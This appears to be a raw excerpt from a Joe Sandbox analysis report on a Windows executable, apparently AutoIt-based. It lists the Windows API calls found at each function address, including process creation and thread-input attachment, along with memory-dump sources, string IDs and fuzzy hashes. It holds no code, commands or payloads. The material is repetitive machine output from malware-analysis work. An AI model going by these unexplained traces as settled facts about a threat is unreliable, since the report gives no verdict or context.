                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                  • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                  • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                                                                                  • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                  • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
APIs
  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
• GetSysColor.USER32(0000000F), ref: 004021D3
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
• Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
• Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
• Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
APIs
• CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
• GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
• _wcscpy.LIBCMT ref: 0046A9FF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
• Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
• Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
• Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
APIs
• _memset.LIBCMT ref: 0048716A
• CreateMenu.USER32 ref: 00487185
• SetMenu.USER32(?,00000000), ref: 00487194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
• IsMenu.USER32(?), ref: 00487237
• CreatePopupMenu.USER32 ref: 00487241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
• DrawMenuBar.USER32 ref: 00487276
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
• Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
• Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
• Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
• CreateCompatibleDC.GDI32(00000000), ref: 00487565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
• SelectObject.GDI32(00000000,00000000), ref: 00487580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
• DeleteDC.GDI32(00000000), ref: 00487594
• GetWindowLongW.USER32(?,000000EC), ref: 0048759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
• Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
• Opcode Fuzzy Hash: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
• Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00426E3E
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                                                                                  • __allrem.LIBCMT ref: 00426F80
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                                                                                  • __allrem.LIBCMT ref: 00426FB3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                                                                                  • __allrem.LIBCMT ref: 00426FE8
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00427077
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00462542
• GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
• SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
• Sleep.KERNEL32(000001F4), ref: 004625EB
• GetMenuItemCount.USER32(?), ref: 0046262F
• GetMenuItemID.USER32(?,00000000), ref: 0046264B
• GetMenuItemID.USER32(?,-00000001), ref: 00462675
• GetMenuItemID.USER32(?,?), ref: 004626BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
• _memset.LIBCMT ref: 00486FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
• VariantInit.OLEAUT32(?), ref: 00456C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
• VariantCopy.OLEAUT32(?,?), ref: 00456C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
• VariantClear.OLEAUT32(?), ref: 00456CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
• VariantClear.OLEAUT32(?), ref: 00456CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• CoInitialize.OLE32 ref: 00478403
• CoUninitialize.OLE32 ref: 0047840E
• CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
• IIDFromString.OLE32(?,?), ref: 004784E1
• VariantInit.OLEAUT32(?), ref: 0047857B
• VariantClear.OLEAUT32(?), ref: 004785DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
• GetLastError.KERNEL32 ref: 0046B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
• GetDlgCtrlID.USER32 ref: 0045901F
• GetParent.USER32 ref: 0045903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
• GetDlgCtrlID.USER32(?), ref: 00459047
• GetParent.USER32(?), ref: 00459063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
• Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
• Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
• Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
• GetDlgCtrlID.USER32 ref: 00459108
• GetParent.USER32 ref: 00459124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
• GetDlgCtrlID.USER32(?), ref: 00459130
• GetParent.USER32(?), ref: 0045914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
• Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
• Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
• Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
APIs
• GetParent.USER32 ref: 0045916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
• _wcscmp.LIBCMT ref: 00459196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
• Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
• Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
• Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
APIs
• GetCurrentThreadId.KERNEL32 ref: 004611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
• GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
• Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
• Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
• Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-2080382077
• Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
• Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
• Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
• Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
APIs
• EnumChildWindows.USER32(?,0045A439), ref: 0045A377
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                                  • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                                                                                  • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                                                                                  • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                                                                                                  • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
  • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
  • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
  • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
• GetDC.USER32 ref: 0043CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
• SelectObject.GDI32(00000000,00000000), ref: 0043CD53
• SelectObject.GDI32(00000000,00000000), ref: 0043CD68
• ReleaseDC.USER32(?,00000000), ref: 0043CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
• Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
• Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
• Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
APIs
• RtlDecodePointer.NTDLL(00000000), ref: 00AB1A3E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 144edc9b09e347110a533c5830e348cf9a8f01d0fb3062f17fea6b7e2b0f1dc9
• Instruction ID: e58261dff0f2985f7021d20891fed9316d3a0d67663b0282c26a9f491eaa7395
• Opcode Fuzzy Hash: 144edc9b09e347110a533c5830e348cf9a8f01d0fb3062f17fea6b7e2b0f1dc9
• Instruction Fuzzy Hash: F651B07190050ACBCF10DFA8E958AECBFB8FF49310FA54299D441A7266CB759E24CB54
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
• SysFreeString.OLEAUT32(?), ref: 00478F00
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
• Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
• Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
• Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
APIs
• _memset.LIBCMT ref: 0047F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
• CloseHandle.KERNEL32(?), ref: 0047FAAB
• CloseHandle.KERNEL32(?), ref: 0047FB22
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 553cec400721afd5eed0b01d75d33cb7bb54fbf11b1f514b6aea5bab6d8c8d90
• Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
• Opcode Fuzzy Hash: 553cec400721afd5eed0b01d75d33cb7bb54fbf11b1f514b6aea5bab6d8c8d90
